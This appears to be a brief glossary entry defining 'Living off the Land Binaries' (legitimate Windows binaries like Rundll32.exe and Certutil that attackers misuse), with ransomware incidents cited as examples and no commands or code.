A Living off the Land Binary, or a Lolbin, is a legitimate system binary such as a DLL that comes shipped with Windows operating systems that an attacker can leverage in attacks such as a fileless malware attack. The Lolbin definition may also include legitimate and signed administration tools. For example, PsExec.
Lolbin Definition and Meaning
Thousands of DLLs come pre-installed with Windows, and are a shared pool of resources used for legitimate purposes, designed to lower Windows program size (DLLs account for several GBs of Windows installs) and to avoid re-inventing the wheel. With so many DLLs there is a risk of misuse from known and unknown vulnerabilities. DLL Search Order Hijacking and DLL side loading makes it easier for an attack to further hijack other DLLs. Lolbins have a disproportinately high usage by Advaned Persistent Threats (APTs).
- Presentation Host: Executes XAML Browser Application (XBAP) files, can therefore be used to execute a malicious XBAP file.
- Rundll32.exe: Used by Windows to execute DLL files. Can be used for attacks including Pass-Thru Command Execution and Lateral Movement.
- Certutil: Used for certificate handling. Used in the Kaseya Ransomware Attack.
Examples of lolbin attacks
- Kaseya Ransomware Attack (REvil): The legitimate Certutil.exe binary was used to launch the ransomware.
- WastedLocker Ransomware: Rundll32.exe was used in the WastedLocker Ransomware Attack.
- Live off the Land Binary
- Living off the Land Binary
For a community-maintained list of examples, see the Lolbas Github project.
Agreed upon as an official term alongisde LOLScripts in 2018.